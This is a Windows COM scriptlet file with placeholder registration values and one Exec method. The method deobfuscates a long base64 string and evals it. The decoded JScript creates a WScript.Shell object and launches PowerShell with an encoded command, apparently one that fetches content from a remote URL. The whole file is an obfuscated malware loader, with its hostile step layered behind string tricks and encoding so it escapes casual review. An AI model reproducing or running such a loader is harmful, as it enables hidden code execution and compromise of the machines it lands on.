<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>

<public>
    <method name="Exec"></method>
</public>

<script language="JScript">
<![CDATA[
	function Exec()	{
	var encode_str = "(DQogI(CAgDQ(oNCiB(2YXIg(c2hlb(GwgPS(BuZXc(gQWN0(aXZlW(E9iam(VjdCg(iV1Nj(cmlwd(C5TaG(VsbCI(pOw0K(ICANC(iBzaG(VsbC5(SdW4o(InBvd(2Vyc2(hlbGw(uZXhl(IC1lI(GFRQj(NBSEl(BSUFB(dEFIV(UFjZ0(JwQUN(BQWFB(QjBBS(FFBY0(FCekF(Eb0FM(d0F2Q(UhJQV(lRQjN(BQzRB(WndCc(EFIUU(FhQUI(xQUdJ(QWRRQ(npBR1(VBY2d(CakFH(OEFiZ(0IwQU(dVQWJ(nQjBB(QzRBW(XdCdk(FHMEF(Md0JE(QUhBQ(WNBQn(BBSE1(BWWdC(bEFHR(UFkUU(IwQUd(rQVpn(QjFBR(3dBT1(FBMEF(ESUFO(QUF4Q(UM4QW(RBQjN(BRElB(TXdBe(EFDOE(FjZ0J(sQUdZ(QWN3Q(XZBR2(dBWlF(CaEFH(UUFjd(0F2QU(cwQVl(RQnBB(RzRBT(HdCdE(FITUF(kZ0Jq(QUhBQ(U1RQT(BBREF(BTGdC(a0FHd(0FiQU(FnQUM(wQWJ3(QjFBS(FFBWm(dCcEF(Hd0Fa(UUFnQ(UVNQU(9nQmN(BRlVB(Y3dCb(EFISU(Fjd0J(jQUVF(QVJBQ(k5BRW(tBVGd(CSkFI(NEFNU(UJjQU(VFQWN(BQndB(RVFBW(VFCME(FHRUF(YQUJN(QUc4Q(Vl3Qm(hBR3d(BWEFC(VUFHV(UFiUU(J3QUM(4QWJR(QnpBS(FlBWX(dCd0F(ERUFO(QUF3Q(UM0QV(pBQnN(BR3dB(T3dCc(EFIY0(FjZ0F(nQUMw(QWRRQ(nlBR2(tBSUF(Cb0FI(UUFkQ(UJ3QU(hNQU9(nQXZB(QzhBY(2dCaE(FIY0F(MZ0Ju(QUdrQ(WRBQm(9BSFV(BWWdC(MUFIT(UFaUU(J5QUd(NQWJ3(QnVBS(FFBWl(FCdUF(IUUFM(Z0JqQ(Uc4QW(JRQXZ(BRU1B(Y0FCd(0FHa0(Fjd0J(pQUdV(QVlRQ(jFBSF(FBYVF(CbUFI(VUFiQ(UE1QU(RRQU1(nQTBB(REVBT(HdCME(FIY0F(NZ0F6(QURFQ(Ux3Qn(lBR1V(BWmdC(ekFDO(EFhQU(JsQUd(FQVpB(QnpBQ(zhBYl(FCaEF(Ha0Fi(Z0F2Q(UhBQV(pBQm1(BQzRB(WlFCN(EFHVU(FJQUF(0QUc4(QWRRQ(jBBR1(lBYVF(Cc0FH(VUFJQ(UJEQU(RvQVh(BQlZB(SE1BW(lFCeU(FITUF(YQUJC(QUVRQ(VRRQk(pBRTR(BU1FC(K0FER(UFYQU(JCQUh(BQWNB(QkVBR(0VBZE(FCaEF(Gd0FU(QUJ2Q(UdNQV(lRQnN(BRndB(VkFCb(EFHME(FjQUF(2QUhB(QVpBQ(m1BQz(RBWlF(CNEFH(VUFPd(0J6QU(hRQVl(RQnlB(SFFBT(FFCd0(FISUF(id0Jq(QUdVQ(WN3Qn(pBQ0F(BUXdB(NkFGd(0FWUU(J6QUd(VQWNn(QnpBR(ndBUV(FCRUF(FMEFT(UUJPQ(UVrQW(ZnQXh(BRndB(UVFCd(0FIQU(FSQUJ(oQUhR(QVlRQ(mNBRX(dBYnd(CakFH(RUFiQ(UJjQU(ZRQVp(RQnRB(SEFBT(HdCd0(FHUUF(aZ0F1(QUdVQ(WVBQm(xBQT0(9IikN(Cg0KI(CAgIA(0KICA(gIA0K(IA0KD(Qo)";
	var decode_str = encode_str.split("(").join("");
	var decode_str = decode_str.split(")").join("=");

	decodeBase64 = function(s) {
   	 var e={},i,b=0,c,x,l=0,a,r='',w=String.fromCharCode,L=s.length;
    	var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    	for(i=0;i<64;i++){e[A.charAt(i)]=i;}
    	for(x=0;x<L;x++){
        	c=e[s.charAt(x)];b=(b<<6)+c;l+=6;
        	while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(r+=w(a));}
   	 }
    	return r;
	};

	var decoded = decodeBase64(decode_str);
	eval(decoded)
}
]]>
</script>
</scriptlet>
